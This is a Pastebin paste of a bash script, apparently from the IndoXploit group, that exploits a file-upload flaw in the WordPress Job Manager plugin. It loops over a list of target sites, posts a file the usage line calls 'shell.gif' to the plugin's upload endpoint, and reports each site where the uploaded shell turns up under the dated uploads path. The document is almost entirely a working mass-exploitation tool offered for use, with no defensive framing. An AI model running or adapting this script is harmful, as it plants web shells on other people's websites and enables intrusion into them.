AgusSR

WordPress Plugin Job Manager File Upload

Jun 6th, 2017
1,630
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Coded by L0c4lh34rtz - IndoXploit
  3.  
  4. args=("$@")
  5. target=$(pwd)"/"${args[0]}
  6. file_=$(pwd)"/"${args[1]}
  7. tgl=$(date +"%Y")
  8. bln=$(date +"%m")
  9.  
  10. if [ -z "$2" ]
  11.     then
  12.     echo "usage: wpjob.sh target.txt shell.gif"
  13. else
  14.     for url in $(cat $target)
  15.     do
  16.         echo "[+] Scanning $url"
  17.         vuln="$url/jm-ajax/upload_file/"
  18.         shell="$url/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/"$(basename "$file_")
  19.  
  20.         curl -s --connect-timeout 10 -k -H "User-Agent: indoxploit" -F "file=@$file_" "$vuln" -o /dev/null
  21.         check=$(curl -s -k -w "%{http_code}" -H "User-Agent: indoxploit" "$shell" -o /dev/null)
  22.  
  23.         if (($check == 200))
  24.             then
  25.             echo -e "\e[92m$shell\e[0m"
  26.         fi
  27.     done
  28. fi
RAW Paste Data